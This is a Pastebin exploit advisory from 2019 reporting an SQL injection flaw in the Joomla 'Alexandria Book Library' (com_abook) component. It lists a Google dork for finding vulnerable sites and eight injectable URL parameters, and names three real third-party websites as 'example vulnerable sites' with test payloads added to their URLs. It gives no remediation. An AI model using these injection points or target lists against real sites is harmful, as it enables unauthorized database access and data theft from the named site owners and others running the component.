Advertisement
KingSkrupellos

Joomla ABook Alexandria Book Library 3.1.4 SQL Injection

Feb 11th, 2019
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.00 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla ABook Alexandria Book Library 3.1.4 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 12/02/2019
  7. # Vendor Homepage : alexandriabooklibrary.org
  8. # Software Download Link : alexandriabooklibrary.org/en/downloads/18-components.html
  9. # Software Information Link : extensions.joomla.org/extension/alexandria-book-library/
  10. # Software Affected Version : 3.1.4 - 2.0.4 and 1.1.2
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_abook''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. Alexandria Book Library is free and open source.
  26.  
  27. Alexandria Book Library is a Joomla component that make you the ability to manage
  28.  
  29. your personal book library or a public library.
  30.  
  31. ####################################################################
  32.  
  33. # Impact :
  34. ***********
  35. * Joomla ABook Alexandria Book Library 3.1.4 and other versions -
  36.  
  37. component for Joomla is prone to an SQL-injection vulnerability because it
  38.  
  39. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  40.  
  41. Exploiting this issue could allow an attacker to compromise the application,
  42.  
  43. access or modify data, or exploit latent vulnerabilities in the underlying database.
  44.  
  45. A remote attacker can send a specially crafted request to the vulnerable application
  46.  
  47. and execute arbitrary SQL commands in application`s database.
  48.  
  49. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  50.  
  51. An attacker can exploit this issue using a browser.
  52.  
  53. ####################################################################
  54.  
  55. # SQL Injection Exploit :
  56. **********************
  57. /index.php?option=com_abook&view=author&id=[SQL Injection]
  58.  
  59. /index.php?option=com_abook&view=author&id=[SQL Injection]&lang=it
  60.  
  61. /index.php?option=com_abook&view=category&letter=[SQL Injection]
  62.  
  63. /index.php?option=com_abook&view=tag&id=[ID-NUMBER]&Itemid=[SQL Injection]&lang=es
  64.  
  65. /index.php?option=com_abook&view=author&id=[ID-NUMBER]:[BOOK-NAME-HERE]&Itemid=[SQL Injection]
  66.  
  67. /index.php?option=com_abook&view=book&catid=[ID-NUMBER]::[BOOK-NAME-HERE]&Itemid=[SQL Injection]
  68.  
  69. /index.php?option=com_abook&view=author&id=[ID-NUMBER]::[BOOK-NAME-HERE]&Itemid=[SQL Injection]&lang=it
  70.  
  71. /index.php?option=com_abook&view=book&id=[ID-NUMBER]:[BOOK-NAME-HERE]&catid=[ID-NUMBER]::[BOOK-NAME-HERE]&Itemid=[SQL Injection]
  72.  
  73. ####################################################################
  74.  
  75. # Example Vulnerable Sites :
  76. *************************
  77. [+] piacenzaeprovincia.eu/public/index.php?option=com_abook
  78. &view=author&id=19:franca-iole-pietrafitta&Itemid=758%27&lang=it
  79.  
  80. [+] shatterboxwebdesign.com/rrcna/index.php?option=com_abook&view=
  81. book&catid=14%3Areading-level-14
  82. &id=99%3Ahole_in_the_king%27s_sock_the&Itemid=526%27
  83.  
  84. [+] scuoladiagopuntura.it/ws/it/?option=com_abook&view=book
  85. &id=1:massaggio-e-moxibustione-in-pediatria&catid=
  86. 2:agopuntura-e-medicina-cinese&Itemid=200
  87.  
  88. ####################################################################
  89.  
  90. # Example SQL Database Error :
  91. ****************************
  92. Strict Standards: Static function JDatabase::test() should not be
  93. abstract in /home/elliott/public_html/libraries/joomla/database/database.php on line 350
  94. Infinite loop detected in JErrorInfinite loop detected in JError
  95.  
  96. ####################################################################
  97.  
  98. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  99.  
  100. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement